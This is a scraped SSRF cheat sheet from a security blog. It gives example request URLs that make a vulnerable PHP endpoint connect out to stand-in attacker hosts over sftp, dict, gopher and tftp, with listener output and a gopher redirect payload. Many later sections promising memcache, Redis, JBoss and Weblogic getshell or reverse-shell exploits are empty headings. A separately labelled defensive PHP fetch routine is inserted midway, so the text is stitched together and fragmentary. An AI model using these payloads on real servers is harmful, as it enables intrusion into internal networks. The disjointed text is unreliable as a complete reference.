SSRF Tips

SSRF PHP function

   
 file_get_contents() fsockopen() curl_exec() 

URL schema support

SFTP

     
 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

Dict

     
 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

gopher

            
 // http://0cx.cc/ssrf.php?url=http://evil.com/gopher.php <?php         header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest'); ?>  evil.com:# nc -v -l 12346 Listening on [0.0.0.0] (family 0, port 12346) Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398) HI Multiline test 

TFTP

      
 http://0cx.cc/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET  evil.com:# nc -v -u -l 12346 Listening on [0.0.0.0] (family 0, port 12346) TESTUDPPACKEToctettsize0blksize512timeout6 

file

ldap
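The schemes listed above are reachable because the fetching code hands whatever arrives in ?url= straight to file_get_contents() or curl_exec(). The following is an added example, not code from the original post or from any of the tools it names: the vulnerable pattern next to a hardened fetch in PHP that allow-lists the scheme, resolves the host once, rejects private, loopback and link-local addresses, and pins the checked address into libcurl. It assumes PHP 8.0 or later with ext-curl; the function names fetch_unsafe, fetch_hardened and is_public_ip are illustrative, and the URLs in the CLI demo are constructed from the post's own examples.

```php
<?php
// Added example, not part of the original post: the request pattern behind
// the post's ssrf.php?url= examples, beside a hardened fetch that closes the
// scheme and destination holes the URL-schema section lists.
// Assumptions: PHP 8.0+ with ext-curl; fetch_unsafe / fetch_hardened /
// is_public_ip are illustrative names, not functions from any library.

// VULNERABLE: the caller's URL goes straight to the stream layer, so sftp://,
// dict://, gopher://, tftp://, file:// and ldap:// are all reachable, and so
// is every host the server itself can reach.
function fetch_unsafe(string $url): string|false
{
    return @file_get_contents($url);
}

// True only for globally routable addresses. NO_PRIV_RANGE rejects 10/8,
// 172.16/12 and 192.168/16; NO_RES_RANGE rejects 0/8, 127/8, 169.254/16,
// 240/4 and ::1, which covers loopback and the 169.254.169.254 cloud
// metadata endpoint. Note: 100.64/10 (CGNAT) is not covered by these flags.
function is_public_ip(string $ip): bool
{
    return filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    ) !== false;
}

// HARDENED: allow-list the scheme, resolve the host once, check the address,
// pin that address into libcurl so the connection cannot be re-resolved to a
// different one (DNS rebinding), and refuse redirects, which would otherwise
// re-open both holes.
function fetch_hardened(string $url, int $timeout = 5): string
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        throw new InvalidArgumentException('malformed URL');
    }
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException("scheme not allowed: $scheme");
    }
    $host = $parts['host'];
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);

    // gethostbyname() is IPv4-only and echoes its input when resolution fails;
    // an IPv6-capable deployment would also check dns_get_record($host, DNS_AAAA).
    $ip = gethostbyname($host);
    if ($ip === $host && filter_var($host, FILTER_VALIDATE_IP) === false) {
        throw new RuntimeException("cannot resolve $host");
    }
    if (!is_public_ip($ip)) {
        throw new RuntimeException("$host resolves to non-public address $ip");
    }

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS, // libcurl-level scheme lock
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,
        CURLOPT_RESOLVE         => ["$host:$port:$ip"],            // pin the checked address
        CURLOPT_CONNECTTIMEOUT  => $timeout,
        CURLOPT_TIMEOUT         => $timeout,
    ]);
    $body = curl_exec($ch);
    $err  = curl_error($ch);
    curl_close($ch);
    if ($body === false) {
        throw new RuntimeException("fetch failed: $err");
    }
    return $body;
}

// Constructed inputs: the post's own dict://, sftp:// and gopher:// forms plus
// two loopback/link-local URLs; each is rejected before a connection is opened.
if (PHP_SAPI === 'cli') {
    foreach ([
        'dict://attacker:11111/',
        'sftp://evil.com:11111/',
        'gopher://evil.com:12346/_HI%0AMultiline%0Atest',
        'http://127.0.0.1:11211/',
        'http://169.254.169.254/latest/meta-data/',
    ] as $u) {
        try {
            fetch_hardened($u);
            echo "allowed: $u\n";
        } catch (Throwable $e) {
            echo "blocked: $u (" . $e->getMessage() . ")\n";
        }
    }
}
```

The two layers are deliberate: the parse_url() scheme check stops file://, dict://, gopher:// and friends before any network call, and CURLOPT_PROTOCOLS repeats the restriction inside libcurl, so a parsing disagreement between PHP and libcurl cannot reintroduce them. Resolving once and pinning via CURLOPT_RESOLVE is what closes the gap between "the address we checked" and "the address libcurl connects to"; without it a short-TTL DNS record can pass the check and then point at an internal host.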

PHP-FPM

PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o exploit

SSRF memcache Getshell

Generate serialize

Output

webshell.php

back.php

example Discuz

open the website

clear data

backdoor url

SSRF Redis Getshell

Generate serialize

Output

example Discuz

Open website

Backdoor website

FFmpeg

cat test.jpg

subfile

PostgreSQL

Exploit

MongoDB

Exploit

CouchDB

exploit

An attacker could also make the CouchDB server send requests to the intranet by using its replication function.

Jboss

JBoss POC

Write shell

reverse shell

Weblogic

gopher.php

vuln website

vps

Local File Read

Bool SSRF

Struts2-016 POC

SSRF Proxy

SSRF_Proxy

ssrfsocks

From: http://blog.safebuff.com/2016/07/03/SSRF-Tips/
